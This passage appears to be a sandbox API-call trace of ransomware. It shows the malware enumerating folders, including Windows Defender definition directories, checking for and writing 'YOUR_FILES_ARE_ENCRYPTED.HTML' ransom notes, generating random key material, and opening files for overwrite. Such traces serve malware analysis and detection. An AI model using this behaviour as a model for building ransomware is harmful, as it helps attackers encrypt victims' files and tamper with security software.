ftLastAccessTime.dwLowDateTime=0xaf0cbca0, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf0cf73b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.212] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0cbca0, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf0cbca0, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf0cf73b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.212] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0110.212] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WDF\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0110.212] GetProcessHeap () returned 0x600000 [0110.212] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WDF\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\wdf\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.213] GetProcessHeap () returned 0x600000 [0110.213] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.213] GetProcessHeap () returned 0x600000 [0110.213] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.216] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77d1fe08, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77d1fe08, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="Windows", cAlternateFileName="")) returned 1 [0110.216] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35c3f417, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1 [0110.216] StrStrIW (lpFirst="Windows Defender", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.216] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender") returned 49 [0110.216] GetProcessHeap () returned 0x600000 [0110.216] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.217] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender" [0110.217] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*" [0110.217] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35c3f417, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf5ca180, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.217] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35c3f417, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf5ca180, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.217] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Clean Store", cAlternateFileName="CLEANS~1")) returned 1 [0110.217] StrStrIW (lpFirst="Clean Store", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.217] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Clean Store") returned 61 [0110.217] GetProcessHeap () returned 0x600000 [0110.217] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.218] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Clean Store" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Clean Store") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Clean Store" [0110.218] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Clean Store", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Clean Store\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Clean Store\\*" [0110.218] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Clean Store\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf102bff, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.218] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf102bff, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="..", cAlternateFileName="")) returned 1 [0110.218] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0e56d3, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf0e56d3, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf108d29, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.218] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0e56d3, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf0e56d3, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf108d29, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.218] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.218] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Clean Store\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0110.218] GetProcessHeap () returned 0x600000 [0110.218] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Clean Store\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\clean store\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.219] GetProcessHeap () returned 0x600000 [0110.219] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.219] GetProcessHeap () returned 0x600000 [0110.219] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.219] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Definition Updates", cAlternateFileName="DEFINI~1")) returned 1 [0110.219] StrStrIW (lpFirst="Definition Updates", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.219] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates") returned 68 [0110.219] GetProcessHeap () returned 0x600000 [0110.219] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.220] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates" [0110.220] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*" [0110.220] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf19dc2d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0110.220] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf19dc2d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="..", cAlternateFileName="")) returned 1 [0110.220] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="Backup", cAlternateFileName="")) returned 1 [0110.220] StrStrIW (lpFirst="Backup", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.220] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned 75 [0110.220] GetProcessHeap () returned 0x600000 [0110.221] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.221] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup" [0110.221] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*" [0110.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf117808, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.222] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf117808, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="..", cAlternateFileName="")) returned 1 [0110.222] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf117808, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf117808, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf11b277, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.222] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf117808, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf117808, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf11b277, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.222] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.222] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0110.222] GetProcessHeap () returned 0x600000 [0110.222] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\backup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.222] GetProcessHeap () returned 0x600000 [0110.222] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.223] GetProcessHeap () returned 0x600000 [0110.223] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.223] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3731a3a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="Default", cAlternateFileName="")) returned 1 [0110.223] StrStrIW (lpFirst="Default", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.223] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default") returned 76 [0110.223] GetProcessHeap () returned 0x600000 [0110.223] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.224] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default" [0110.224] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default\\*" [0110.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf160bea, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName=".", cAlternateFileName="")) returned 0x626838 [0110.224] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf160bea, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="..", cAlternateFileName="")) returned 1 [0110.225] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x122870, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="GapaEngine.dll", cAlternateFileName="")) returned 1 [0110.225] StrStrIW (lpFirst="GapaEngine.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.225] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default\\GapaEngine.dll") returned 91 [0110.225] PathFindExtensionW (pszPath="GapaEngine.dll") returned=".dll" [0110.225] lstrlenW (lpString=".dll") returned 4 [0110.225] PathFindExtensionW (pszPath="GapaEngine.dll") returned=".dll" [0110.225] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0110.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default\\GapaEngine.dll" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\default\\gapaengine.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0110.225] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3226d0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe3226d0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe36eb85, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2060ab0, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="MpAsBase.vdm", cAlternateFileName="")) returned 1 [0110.225] StrStrIW (lpFirst="MpAsBase.vdm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.225] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default\\MpAsBase.vdm") returned 89 [0110.225] PathFindExtensionW (pszPath="MpAsBase.vdm") returned=".vdm" [0110.225] lstrlenW (lpString=".vdm") returned 4 [0110.225] PathFindExtensionW (pszPath="MpAsBase.vdm") returned=".vdm" [0110.225] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3226d0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe3226d0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe3226d0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x283f18, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="MpAsDlta.vdm", cAlternateFileName="")) returned 1 [0110.225] StrStrIW (lpFirst="MpAsDlta.vdm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.225] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default\\MpAsDlta.vdm") returned 89 [0110.225] PathFindExtensionW (pszPath="MpAsDlta.vdm") returned=".vdm" [0110.225] lstrlenW (lpString=".vdm") returned 4 [0110.225] PathFindExtensionW (pszPath="MpAsDlta.vdm") returned=".vdm" [0110.225] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36eb85, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe36eb85, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe42d742, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b6f4a0, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="MpAvBase.vdm", cAlternateFileName="")) returned 1 [0110.225] StrStrIW (lpFirst="MpAvBase.vdm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.225] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default\\MpAvBase.vdm") returned 89 [0110.226] PathFindExtensionW (pszPath="MpAvBase.vdm") returned=".vdm" [0110.226] lstrlenW (lpString=".vdm") returned 4 [0110.226] PathFindExtensionW (pszPath="MpAvBase.vdm") returned=".vdm" [0110.226] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, 